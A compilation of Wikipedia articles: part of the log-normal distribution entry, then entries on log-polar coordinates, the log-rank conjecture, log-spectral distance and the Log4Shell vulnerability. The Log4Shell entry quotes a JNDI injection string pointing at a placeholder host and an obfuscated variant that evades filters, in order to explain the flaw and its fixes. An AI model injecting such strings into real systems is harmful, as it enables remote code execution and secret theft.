From this, the MLE for the expectancy of x is: [ 43 ] θ ^ MLE = E [ X ] ^ MLE = e μ ^ + σ ^ 2 / 2 {\displaystyle {\widehat {\theta }}_{\text{MLE}}={\widehat {\operatorname {E} [X]}}_{\text{MLE}}=e^{{\hat {\mu }}+{{\hat {\sigma }}^{2}}/{2}}}
When the individual values x 1 , x 2 , … , x n {\displaystyle x_{1},x_{2},\ldots ,x_{n}} are not available, but the sample's mean x ¯ {\displaystyle {\bar {x}}} and standard deviation s is, then the method of moments can be used. The corresponding parameters are determined by the following formulas, obtained from solving the equations for the expectation E [ X ] {\displaystyle \operatorname {E} [X]} and variance Var [ X ] {\displaystyle \operatorname {Var} [X]} for μ {\displaystyle \mu } and σ {\displaystyle \sigma } : [ 44 ] μ = ln x ¯ 1 + σ ^ 2 / x ¯ 2 , σ 2 = ln ( 1 + σ ^ 2 / x ¯ 2 ) . {\displaystyle {\begin{aligned}\mu &=\ln {\frac {\bar {x}}{\sqrt {1+{\widehat {\sigma }}^{2}/{\bar {x}}^{2}}}},\\[1ex]\sigma ^{2}&=\ln \left(1+{{\widehat {\sigma }}^{2}}/{\bar {x}}^{2}\right).\end{aligned}}}
Other estimators also exist, such as Finney's UMVUE estimator, [ 45 ] the "Approximately Minimum Mean Squared Error Estimator", the "Approximately Unbiased Estimator" and "Minimax Estimator", [ 46 ] also "A Conditional Mean Squared Error Estimator", [ 47 ] and other variations as well. [ 48 ] [ 49 ]
The most efficient way to obtain interval estimates when analyzing log-normally distributed data consists of applying the well-known methods based on the normal distribution to logarithmically transformed data and then to back-transform results if appropriate.
A basic example is given by prediction intervals : For the normal distribution, the interval [ μ − σ , μ + σ ] {\displaystyle [\mu -\sigma ,\mu +\sigma ]} contains approximately two thirds (68%) of the probability (or of a large sample), and [ μ − 2 σ , μ + 2 σ ] {\displaystyle [\mu -2\sigma ,\mu +2\sigma ]} contain 95%. Therefore, for a log-normal distribution,
Using the principle, note that a confidence interval for μ {\displaystyle \mu } is [ μ ^ ± q ⋅ s e ^ ] {\displaystyle [{\widehat {\mu }}\pm q\cdot {\widehat {\mathop {se} }}]} , where s e = σ ^ / n {\displaystyle \mathop {se} ={\widehat {\sigma }}/{\sqrt {n}}} is the standard error and q is the 97.5% quantile of a t distribution with n-1 degrees of freedom. Back-transformation leads to a confidence interval for μ ∗ = e μ {\displaystyle \mu ^{*}=e^{\mu }} (the median), is: [ μ ^ ∗ × / ( sem ∗ ) q ] {\displaystyle [{\widehat {\mu }}^{*}{}^{\times }\!\!/(\operatorname {sem} ^{*})^{q}]} with sem ∗ = ( σ ^ ∗ ) 1 / n {\displaystyle \operatorname {sem} ^{*}=({\widehat {\sigma }}^{*})^{1/{\sqrt {n}}}}
The literature discusses several options for calculating the confidence interval for μ {\displaystyle \mu } (the mean of the log-normal distribution). These include bootstrap as well as various other methods. [ 50 ] [ 51 ]
The Cox Method [ a ] proposes to plug-in the estimators μ ^ = ∑ i ln x i n , S 2 = ∑ i ( ln x i − μ ^ ) 2 n − 1 {\displaystyle {\widehat {\mu }}={\frac {\sum _{i}\ln x_{i}}{n}},\qquad S^{2}={\frac {\sum _{i}\left(\ln x_{i}-{\widehat {\mu }}\right)^{2}}{n-1}}}
and use them to construct approximate confidence intervals in the following way: C I ( E ( X ) ) : exp ( μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) ) {\displaystyle \mathrm {CI} (\operatorname {E} (X)):\exp \left({\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}\right)}
We know that E ( X ) = e μ + σ 2 2 {\displaystyle \operatorname {E} (X)=e^{\mu +{\frac {\sigma ^{2}}{2}}}} . Also, μ ^ {\displaystyle {\widehat {\mu }}} is a normal distribution with parameters: μ ^ ∼ N ( μ , σ 2 n ) {\displaystyle {\widehat {\mu }}\sim N\left(\mu ,{\frac {\sigma ^{2}}{n}}\right)}
S 2 {\displaystyle S^{2}} has a chi-squared distribution , which is approximately normally distributed (via CLT ), with parameters : S 2 ∼ ˙ N ( σ 2 , 2 σ 4 n − 1 ) {\displaystyle S^{2}{\dot {\sim }}N\left(\sigma ^{2},{\frac {2\sigma ^{4}}{n-1}}\right)} . Hence, S 2 2 ∼ ˙ N ( σ 2 2 , σ 4 2 ( n − 1 ) ) {\displaystyle {\frac {S^{2}}{2}}{\dot {\sim }}N\left({\frac {\sigma ^{2}}{2}},{\frac {\sigma ^{4}}{2(n-1)}}\right)} .
Since the sample mean and variance are independent, and the sum of normally distributed variables is also normal , we get that: μ ^ + S 2 2 ∼ ˙ N ( μ + σ 2 2 , σ 2 n + σ 4 2 ( n − 1 ) ) {\displaystyle {\widehat {\mu }}+{\frac {S^{2}}{2}}{\dot {\sim }}N\left(\mu +{\frac {\sigma ^{2}}{2}},{\frac {\sigma ^{2}}{n}}+{\frac {\sigma ^{4}}{2(n-1)}}\right)} Based on the above, standard confidence intervals for μ + σ 2 2 {\displaystyle \mu +{\frac {\sigma ^{2}}{2}}} can be constructed (using a Pivotal quantity ) as: μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) {\displaystyle {\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}} And since confidence intervals are preserved for monotonic transformations, we get that: C I ( E [ X ] = e μ + σ 2 2 ) : exp ( μ ^ + S 2 2 ± z 1 − α 2 S 2 n + S 4 2 ( n − 1 ) ) {\displaystyle \mathrm {CI} \left(\operatorname {E} [X]=e^{\mu +{\frac {\sigma ^{2}}{2}}}\right):\exp \left({\hat {\mu }}+{\frac {S^{2}}{2}}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S^{2}}{n}}+{\frac {S^{4}}{2(n-1)}}}}\right)}
As desired.
Olsson 2005, proposed a "modified Cox method" by replacing z 1 − α 2 {\displaystyle z_{1-{\frac {\alpha }{2}}}} with t n − 1 , 1 − α 2 {\displaystyle t_{n-1,1-{\frac {\alpha }{2}}}} , which seemed to provide better coverage results for small sample sizes. [ 50 ] : Section 3.4
Comparing two log-normal distributions can often be of interest, for example, from a treatment and control group (e.g., in an A/B test ). We have samples from two independent log-normal distributions with parameters ( μ 1 , σ 1 2 ) {\displaystyle (\mu _{1},\sigma _{1}^{2})} and ( μ 2 , σ 2 2 ) {\displaystyle (\mu _{2},\sigma _{2}^{2})} , with sample sizes n 1 {\displaystyle n_{1}} and n 2 {\displaystyle n_{2}} respectively.
Comparing the medians of the two can easily be done by taking the log from each and then constructing straightforward confidence intervals and transforming it back to the exponential scale.
C I ( e μ 1 − μ 2 ) : exp ( μ ^ 1 − μ ^ 2 ± z 1 − α 2 S 1 2 n + S 2 2 n ) {\displaystyle \mathrm {CI} (e^{\mu _{1}-\mu _{2}}):\exp \left({\hat {\mu }}_{1}-{\hat {\mu }}_{2}\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n}}+{\frac {S_{2}^{2}}{n}}}}\right)}
These CI are what's often used in epidemiology for calculation the CI for relative-risk and odds-ratio . [ 54 ] The way it is done there is that we have two approximately Normal distributions (e.g., p 1 and p 2 , for RR), and we wish to calculate their ratio. [ b ]
However, the ratio of the expectations (means) of the two samples might also be of interest, while requiring more work to develop. The ratio of their means is:
E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 / 2 e μ 2 + σ 2 2 / 2 = e ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) {\displaystyle {\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+\sigma _{1}^{2}/2}}{e^{\mu _{2}+\sigma _{2}^{2}/2}}}=e^{(\mu _{1}-\mu _{2})+{\frac {1}{2}}\left(\sigma _{1}^{2}-\sigma _{2}^{2}\right)}}
Plugin in the estimators to each of these parameters yields also a log normal distribution, which means that the Cox Method, discussed above, could similarly be used for this use-case:
C I ( E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 / 2 e μ 2 + σ 2 2 / 2 ) : exp ( ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) ) {\displaystyle \mathrm {CI} \left({\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+\sigma _{1}^{2}/2}}{e^{\mu _{2}+\sigma _{2}^{2}/2}}}\right):\exp \left(\left({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\tfrac {1}{2}}S_{1}^{2}-{\tfrac {1}{2}}S_{2}^{2}\right)\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}\right)}
To construct a confidence interval for this ratio, we first note that μ ^ 1 − μ ^ 2 {\displaystyle {\hat {\mu }}_{1}-{\hat {\mu }}_{2}} follows a normal distribution, and that both S 1 2 {\displaystyle S_{1}^{2}} and S 2 2 {\displaystyle S_{2}^{2}} has a chi-squared distribution , which is approximately normally distributed (via CLT , with the relevant parameters ).
This means that ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ∼ N ( ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) , σ 1 2 n 1 + σ 2 2 n 2 + σ 1 4 2 ( n 1 − 1 ) + σ 2 4 2 ( n 2 − 1 ) ) {\displaystyle ({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\sim N\left((\mu _{1}-\mu _{2})+{\frac {1}{2}}(\sigma _{1}^{2}-\sigma _{2}^{2}),{\frac {\sigma _{1}^{2}}{n_{1}}}+{\frac {\sigma _{2}^{2}}{n_{2}}}+{\frac {\sigma _{1}^{4}}{2(n_{1}-1)}}+{\frac {\sigma _{2}^{4}}{2(n_{2}-1)}}\right)}
Based on the above, standard confidence intervals can be constructed (using a Pivotal quantity ) as: ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) {\displaystyle ({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}} And since confidence intervals are preserved for monotonic transformations, we get that: C I ( E ( X 1 ) E ( X 2 ) = e μ 1 + σ 1 2 2 e μ 2 + σ 2 2 2 ) : e ( ( μ ^ 1 − μ ^ 2 + 1 2 S 1 2 − 1 2 S 2 2 ) ± z 1 − α 2 S 1 2 n 1 + S 2 2 n 2 + S 1 4 2 ( n 1 − 1 ) + S 2 4 2 ( n 2 − 1 ) ) {\displaystyle CI\left({\frac {\operatorname {E} (X_{1})}{\operatorname {E} (X_{2})}}={\frac {e^{\mu _{1}+{\frac {\sigma _{1}^{2}}{2}}}}{e^{\mu _{2}+{\frac {\sigma _{2}^{2}}{2}}}}}\right):e^{\left(({\hat {\mu }}_{1}-{\hat {\mu }}_{2}+{\frac {1}{2}}S_{1}^{2}-{\frac {1}{2}}S_{2}^{2})\pm z_{1-{\frac {\alpha }{2}}}{\sqrt {{\frac {S_{1}^{2}}{n_{1}}}+{\frac {S_{2}^{2}}{n_{2}}}+{\frac {S_{1}^{4}}{2(n_{1}-1)}}+{\frac {S_{2}^{4}}{2(n_{2}-1)}}}}\right)}}
As desired.
It's worth noting that naively using the MLE in the ratio of the two expectations to create a ratio estimator will lead to a consistent , yet biased, point-estimation (we use the fact that the estimator of the ratio is a log normal distribution): [ c ] [ citation needed ]
E [ E ^ ( X 1 ) E ^ ( X 2 ) ] = E [ exp ( ( μ ^ 1 − μ ^ 2 ) + 1 2 ( S 1 2 − S 2 2 ) ) ] ≈ exp [ ( μ 1 − μ 2 ) + 1 2 ( σ 1 2 − σ 2 2 ) + 1 2 ( σ 1 2 n 1 + σ 2 2 n 2 + σ 1 4 2 ( n 1 − 1 ) + σ 2 4 2 ( n 2 − 1 ) ) ] {\displaystyle {\begin{aligned}\operatorname {E} \left[{\frac {{\widehat {\operatorname {E} }}(X_{1})}{{\widehat {\operatorname {E} }}(X_{2})}}\right]&=\operatorname {E} \left[\exp \left(\left({\widehat {\mu }}_{1}-{\widehat {\mu }}_{2}\right)+{\tfrac {1}{2}}\left(S_{1}^{2}-S_{2}^{2}\right)\right)\right]\\&\approx \exp \left[{(\mu _{1}-\mu _{2})+{\frac {1}{2}}(\sigma _{1}^{2}-\sigma _{2}^{2})+{\frac {1}{2}}\left({\frac {\sigma _{1}^{2}}{n_{1}}}+{\frac {\sigma _{2}^{2}}{n_{2}}}+{\frac {\sigma _{1}^{4}}{2(n_{1}-1)}}+{\frac {\sigma _{2}^{4}}{2(n_{2}-1)}}\right)}\right]\end{aligned}}}
In applications, σ {\displaystyle \sigma } is a parameter to be determined. For growing processes balanced by production and dissipation, the use of an extremal principle of Shannon entropy shows that [ 55 ] σ = 1 6 {\displaystyle \sigma ={\frac {1}{\sqrt {6}}}}
This value can then be used to give some scaling relation between the inflexion point and maximum point of the log-normal distribution. [ 55 ] This relationship is determined by the base of natural logarithm, e = 2.718 … {\displaystyle e=2.718\ldots } , and exhibits some geometrical similarity to the minimal surface energy principle.
These scaling relations are useful for predicting a number of growth processes (epidemic spreading, droplet splashing, population growth, swirling rate of the bathtub vortex, distribution of language characters, velocity profile of turbulences, etc.).
For example, the log-normal function with such σ {\displaystyle \sigma } fits well with the size of secondarily produced droplets during droplet impact [ 56 ] and the spreading of an epidemic disease. [ 57 ]
The value σ = 1 / 6 {\textstyle \sigma =1{\big /}{\sqrt {6}}} is used to provide a probabilistic solution for the Drake equation. [ 58 ]
The log-normal distribution is important in the description of natural phenomena. Many natural growth processes are driven by the accumulation of many small percentage changes which become additive on a log scale. Under appropriate regularity conditions, the distribution of the resulting accumulated changes will be increasingly well approximated by a log-normal, as noted in the section above on " Multiplicative Central Limit Theorem ". This is also known as Gibrat's law , after Robert Gibrat (1904–1980) who formulated it for companies. [ 59 ] If the rate of accumulation of these small changes does not vary over time, growth becomes independent of size. Even if this assumption is not true, the size distributions at any age of things that grow over time tends to be log-normal. [ citation needed ] Consequently, reference ranges for measurements in healthy individuals are more accurately estimated by assuming a log-normal distribution than by assuming a symmetric distribution about the mean. [ citation needed ]
A second justification is based on the observation that fundamental natural laws imply multiplications and divisions of positive variables. Examples are the simple gravitation law connecting masses and distance with the resulting force, or the formula for equilibrium concentrations of chemicals in a solution that connects concentrations of educts and products. Assuming log-normal distributions of the variables involved leads to consistent models in these cases.
Specific examples are given in the following subsections. [ 60 ] contains a review and table of log-normal distributions from geology, biology, medicine, food, ecology, and other areas. [ 61 ] is a review article on log-normal distributions in neuroscience, with annotated bibliography. | https://en.wikipedia.org/wiki/Log-normal_distribution |
In mathematics , log-polar coordinates (or logarithmic polar coordinates ) is a coordinate system in two dimensions, where a point is identified by two numbers, one for the logarithm of the distance to a certain point, and one for an angle . Log-polar coordinates are closely connected to polar coordinates , which are usually used to describe domains in the plane with some sort of rotational symmetry . In areas like harmonic and complex analysis , the log-polar coordinates are more canonical than polar coordinates.
Log-polar coordinates in the plane consist of a pair of real numbers (ρ,θ), where ρ is the logarithm of the distance between a given point and the origin and θ is the angle between a line of reference (the x -axis) and the line through the origin and the point. The angular coordinate is the same as for polar coordinates, while the radial coordinate is transformed according to the rule
Where r {\displaystyle r} is the distance to the origin. The formulas for transformation from Cartesian coordinates to log-polar coordinates are given by
and the formulas for transformation from log-polar to Cartesian coordinates are
By using complex numbers ( x , y ) = x + iy , the latter transformation can be written as
i.e. the complex exponential function. From this follows that basic equations in harmonic and complex analysis will have the same simple form as in Cartesian coordinates. This is not the case for polar coordinates.
Laplace's equation in two dimensions is given by
in Cartesian coordinates. Writing the same equation in polar coordinates gives the more complicated equation
or equivalently
However, from the relation r = e ρ {\displaystyle r=e^{\rho }} it follows that r ∂ ∂ r = ∂ ∂ ρ {\displaystyle r{\frac {\partial }{\partial r}}={\frac {\partial }{\partial \rho }}} so Laplace's equation in log-polar coordinates,
has the same simple expression as in Cartesian coordinates. This is true for all coordinate systems where the transformation to Cartesian coordinates is given by a conformal mapping . Thus, when considering Laplace's equation for a part of the plane with rotational symmetry, e.g. a circular disk, log-polar coordinates is the natural choice.
A similar situation arises when considering analytical functions . An analytical function f ( x , y ) = u ( x , y ) + i v ( x , y ) {\displaystyle f(x,y)=u(x,y)+iv(x,y)} written in Cartesian coordinates satisfies the Cauchy–Riemann equations:
If the function instead is expressed in polar form f ( r e i θ ) = R e i Φ {\displaystyle f(re^{i\theta })=Re^{i\Phi }} , the Cauchy–Riemann equations take the more complicated form
Just as in the case with Laplace's equation, the simple form of Cartesian coordinates is recovered by changing polar into log-polar coordinates (let P = log R {\displaystyle P=\log R} ):
The Cauchy–Riemann equations can also be written in one single equation as
By expressing ∂ ∂ x {\displaystyle {\frac {\partial }{\partial x}}} and ∂ ∂ y {\displaystyle {\frac {\partial }{\partial y}}} in terms of ∂ ∂ ρ {\displaystyle {\frac {\partial }{\partial \rho }}} and ∂ ∂ θ {\displaystyle {\frac {\partial }{\partial \theta }}} this equation can be written in the equivalent form
When one wants to solve the Dirichlet problem in a domain with rotational symmetry, the usual thing to do is to use the method of separation of variables for partial differential equations for Laplace's equation in polar form. This means that you write u ( r , θ ) = R ( r ) Θ ( θ ) {\displaystyle u(r,\theta )=R(r)\Theta (\theta )} . Laplace's equation is then separated into two ordinary differential equations
where ν {\displaystyle \nu } is a constant. The first of these has constant coefficients and is easily solved. The second is a special case of Euler's equation
where c , d {\displaystyle c,d} are constants. This equation is usually solved by the ansatz R ( r ) = r λ {\displaystyle R(r)=r^{\lambda }} , but through use of log-polar radius, it can be changed into an equation with constant coefficients:
When considering Laplace's equation, c = 1 {\displaystyle c=1} and d = − ν 2 {\displaystyle d=-\nu ^{2}} so the equation for r {\displaystyle r} takes the simple form
When solving the Dirichlet problem in Cartesian coordinates, these are exactly the equations for x {\displaystyle x} and y {\displaystyle y} . Thus, once again the natural choice for a domain with rotational symmetry is not polar, but rather log-polar, coordinates.
In order to solve a PDE numerically in a domain, a discrete coordinate system must be introduced in this domain. If the domain has rotational symmetry and you want a grid consisting of rectangles, polar coordinates are a poor choice, since in the center of the circle it gives rise to triangles rather than rectangles. However, this can be remedied by introducing log-polar coordinates in the following way. Divide the plane into a grid of squares with side length 2 π {\displaystyle \pi } / n , where n is a positive integer. Use the complex exponential function to create a log-polar grid in the plane. The left half-plane is then mapped onto the unit disc, with the number of radii equal to n . It can be even more advantageous to instead map the diagonals in these squares, which gives a discrete coordinate system in the unit disc consisting of spirals, see the figure to the right.
The latter coordinate system is for instance suitable for dealing with Dirichlet and Neumann problems. If the discrete coordinate system is interpreted as an undirected graph in the unit disc, it can be considered as a model for an electrical network. To every line segment in the graph is associated a conductance given by a function γ {\displaystyle \gamma } . The electrical network will then serve as a discrete model for the Dirichlet problem in the unit disc, where the Laplace equation takes the form of Kirchhoff's law. On the nodes on the boundary of the circle, an electrical potential (Dirichlet data) is defined, which induces an electric current (Neumann data) through the boundary nodes. The linear operator Λ γ {\displaystyle \Lambda _{\gamma }} from Dirichlet data to Neumann data is called a Dirichlet-to-Neumann operator , and depends on the topology and conductance of the network.
In the case with the continuous disc, it follows that if the conductance is homogeneous, let's say γ = 1 {\displaystyle \gamma =1} everywhere, then the Dirichlet-to-Neumann operator satisfies the following equation
Already at the end of the 1970s, applications for the discrete spiral coordinate system were given in image analysis ( image registration ). To represent an image in this coordinate system rather than in Cartesian coordinates, gives computational advantages when rotating or zooming in an image. Also, the photo receptors in the retina in the human eye are distributed in a way that has big similarities with the spiral coordinate system. [ 1 ] It can also be found in the Mandelbrot fractal (see picture to the right).
Log-polar coordinates can also be used to construct fast methods for the Radon transform and its inverse. [ 2 ] | https://en.wikipedia.org/wiki/Log-polar_coordinates |
In theoretical computer science , the log-rank conjecture states that the deterministic communication complexity of a two-party Boolean function is polynomially related to the logarithm of the rank of its input matrix. [ 1 ] [ 2 ]
Let D ( f ) {\displaystyle D(f)} denote the deterministic communication complexity of a function, and let rank ( f ) {\displaystyle \operatorname {rank} (f)} denote the rank of its input matrix M f {\displaystyle M_{f}} (over the reals). Since every protocol using up to c {\displaystyle c} bits partitions M f {\displaystyle M_{f}} into at most 2 c {\displaystyle 2^{c}} monochromatic rectangles, and each of these has rank at most 1,
The log-rank conjecture states that D ( f ) {\displaystyle D(f)} is also upper-bounded by a polynomial in the log-rank: for some constant C {\displaystyle C} ,
Lovett [ 3 ] proved the upper bound
This was improved by Sudakov and Tomon, [ 4 ] who removed the logarithmic factor, showing that
This is the best currently known upper bound.
The best known lower bound, due to Göös, Pitassi and Watson, [ 5 ] states that C ≥ 2 {\displaystyle C\geq 2} . In other words, there exists a sequence of functions f n {\displaystyle f_{n}} , whose log-rank goes to infinity, such that
In 2019, an approximate version of the conjecture for randomised communication has been disproved. [ 6 ] | https://en.wikipedia.org/wiki/Log-rank_conjecture |
The log-spectral distance (LSD) , also referred to as log-spectral distortion or root mean square log-spectral distance , is a distance measure between two spectra . [ 1 ] The log-spectral distance between spectra P ( ω ) {\displaystyle P\left(\omega \right)} and P ^ ( ω ) {\displaystyle {\hat {P}}\left(\omega \right)} is defined as p-norm :
Unlike the Itakura–Saito distance , the log-spectral distance is symmetric. [ 2 ]
In speech coding , log spectral distortion for a given frame is defined as the root mean square difference between the original LPC log power spectrum and the quantized or interpolated LPC log power spectrum. Usually the average of spectral distortion over a large number of frames is calculated and that is used as the measure of performance of quantization or interpolation .
When measuring the distortion between signals, the scale or temporality/spatiality of the signals can have different levels of significance to the distortion measures. To incorporate the proper level of significance, the signals can be transformed into a different domain.
When the signals are transformed into the spectral domain with transformation methods such as Fourier transform and DCT , the spectral distance is the measure to compare the transformed signals. LSD incorporates the logarithmic characteristics of the power spectra, and it becomes effective when the processing task of the power spectrum also has logarithmic characteristics, e.g. human listening to the sound signal with different levels of loudness.
Moreover, LSD is equal to the cepstral distance which is the distance between the signals' cepstrum when the p-numbers are the same by Parseval's theorem .
As LSD is in the form of p-norm, it can be represented with different p-numbers and log scales.
For instance, when it is expressed in dB with L2 norm, it is defined as: D L S = 1 2 π ∫ − π π [ 10 log 10 P ( ω ) P ^ ( ω ) ] 2 d ω {\displaystyle D_{LS}={\sqrt {{\frac {1}{2\pi }}\int _{-\pi }^{\pi }\left[10\log _{10}{\frac {P(\omega )}{{\hat {P}}(\omega )}}\right]^{2}\,d\omega }}} .
When it is represented in the discrete space , it is defined as: D L S = { 1 N ∑ n = 1 N [ log P ( n ) − log P ^ ( n ) ] p } 1 / p , {\displaystyle D_{LS}={\left\{{\frac {1}{N}}\sum _{n=1}^{N}\left[\log P(n)-\log {\hat {P}}(n)\right]^{p}\right\}}^{1/p},} where P ( n ) {\displaystyle P\left(n\right)} and P ^ ( n ) {\displaystyle {\hat {P}}\left(n\right)} are power spectra in discrete space.
This computing article is a stub . You can help Wikipedia by expanding it .
This signal processing -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Log-spectral_distance |
Log4Shell ( CVE-2021-44228 ) is a zero-day vulnerability reported in November 2021 in Log4j , a popular Java logging framework , involving arbitrary code execution . [ 2 ] [ 3 ] The vulnerability had existed unnoticed since 2013 and was privately disclosed to the Apache Software Foundation , of which Log4j is a project, by Chen Zhaojun of Alibaba Cloud 's security team on 24 November 2021. [ 4 ]
Before an official CVE identifier was made available on 10 December 2021, the vulnerability circulated with the name "Log4Shell", given by Free Wortley of the LunaSec team, which was initially used to track the issue online. [ 2 ] [ 1 ] [ 5 ] [ 6 ] [ 7 ] Apache gave Log4Shell a CVSS severity rating of 10, the highest available score. [ 8 ] The exploit was simple to execute and is estimated to have had the potential to affect hundreds of millions of devices. [ 7 ] [ 9 ]
The vulnerability takes advantage of Log4j's allowing requests to arbitrary LDAP and JNDI servers, [ 2 ] [ 10 ] [ 11 ] allowing attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information. [ 6 ] A list of its affected software projects has been published by the Apache Security Team . [ 12 ] Affected commercial services include Amazon Web Services , [ 13 ] Cloudflare , iCloud , [ 14 ] Minecraft: Java Edition , [ 15 ] Steam , Tencent QQ and many others. [ 10 ] [ 16 ] [ 17 ] According to Wiz and EY , the vulnerability affected 93% of enterprise cloud environments. [ 18 ]
The vulnerability's disclosure received strong reactions from cybersecurity experts. Cybersecurity company Tenable said the exploit was "the single biggest, most critical vulnerability ever," [ 19 ] Ars Technica called it "arguably the most severe vulnerability ever" [ 20 ] and The Washington Post said that descriptions by security professionals "border on the apocalyptic." [ 9 ]
Log4j is an open-source logging framework that allows software developers to log data within their applications, and can include user input. [ 21 ] It is used ubiquitously in Java applications, especially enterprise software. [ 6 ] Originally written in 2001 by Ceki Gülcü, it is now part of Apache Logging Services, a project of the Apache Software Foundation . [ 22 ] Tom Kellermann, a member of President Obama 's Commission on Cyber Security, described Apache as "one of the giant supports of a bridge that facilitates the connective tissue between the worlds of applications and computer environments". [ 23 ]
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. JNDI can use several directory interfaces, each providing a different scheme of looking up files. Among these interfaces is the Lightweight Directory Access Protocol (LDAP), a non-Java-specific protocol [ 24 ] which retrieves the object data as a URL from an appropriate server, either local or anywhere on the Internet. [ 25 ]
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form ${prefix:name} . [ 25 ] For example, Text: ${java:version} might be converted to Text: Java version 1.7.0_67 . [ 26 ] Among the recognized expressions is ${jndi:<lookup>} ; by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data. ${jndi:ldap://example.com/file} , for example, will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. [ 25 ] Even if execution of the data is disabled, an attacker can still retrieve data—such as secret environment variables —by placing them in the URL, in which case they will be substituted and sent to the attacker's server. [ 27 ] [ 28 ] Besides LDAP, other potentially exploitable JNDI lookup protocols include its secure variant LDAPS, Java Remote Method Invocation (RMI), the Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP). [ 29 ] [ 30 ]
Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header , such as User-Agent . Early mitigations included blocking any requests containing potentially malicious contents, such as ${jndi . [ 31 ] Such basic string matching solutions can be circumvented by obfuscating the request: ${${lower:j}ndi , for example, will be converted into a JNDI lookup after performing the lowercase operation on the letter j . [ 32 ] Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed. [ 25 ]
Fixes for this vulnerability were released on 6 December 2021, three days before the vulnerability was published, in Log4j version 2.15.0-rc1. [ 33 ] [ 34 ] [ 35 ] The fix included restricting the servers and protocols that may be used for lookups. Researchers discovered a related bug, CVE-2021-45046, that allows local or remote code execution in certain non-default configurations and was fixed in version 2.16.0, which disabled all features using JNDI and support for message lookups. [ 36 ] [ 37 ] Two more vulnerabilities in the library were found: a denial-of-service attack , tracked as CVE-2021-45105 and fixed in 2.17.0; and a difficult-to-exploit remote code execution vulnerability, tracked as CVE-2021-44832 and fixed in 2.17.1. [ 38 ] [ 39 ] For previous versions, the class org.apache.logging.log4j.core.lookup.JndiLookup needs to be removed from the classpath to mitigate both vulnerabilities. [ 8 ] [ 36 ] An early recommended fix for older versions was to set the system property log4j2.formatMsgNoLookups to true , but this change does not prevent exploitation of CVE-2021-45046 and was later found to not disable message lookups in certain cases. [ 8 ] [ 36 ]
Newer versions of the Java Runtime Environment (JRE) also mitigate this vulnerability by blocking remote code from being loaded by default, although other attack vectors still exist in certain applications. [ 2 ] [ 27 ] [ 40 ] [ 41 ] Several methods and tools have been published that help detect vulnerable Log4j versions used in built Java packages. [ 42 ]
Where applying updated versions has not been possible, due to a variety of constraints such as lack of resources or third-party managed solutions, filtering outbound network traffic from vulnerable deployments has been the primary recourse for many. [ 43 ] The approach is recommended by NCC Group [ 44 ] and the National Cyber Security Centre (United Kingdom) , [ 45 ] and is an example of a defense in depth measure. The effectiveness of such filtering is evidenced [ 46 ] by laboratory experiments conducted with firewalls capable of intercepting the egress traffic with several wholly or partially vulnerable versions of the library itself and the JRE .
The exploit allows hackers to gain control of vulnerable devices using Java. [ 7 ] Some hackers employ the vulnerability to use victims' devices for cryptocurrency mining , creating botnets , sending spam, establishing backdoors and other illegal activities such as ransomware attacks. [ 7 ] [ 9 ] [ 47 ] In the days following the vulnerability's disclosure, Check Point observed millions of attacks being initiated by hackers, with some researchers observing a rate of over one hundred attacks per minute that ultimately resulted with attempted attacks on over 40% of business networks internationally. [ 7 ] [ 23 ]
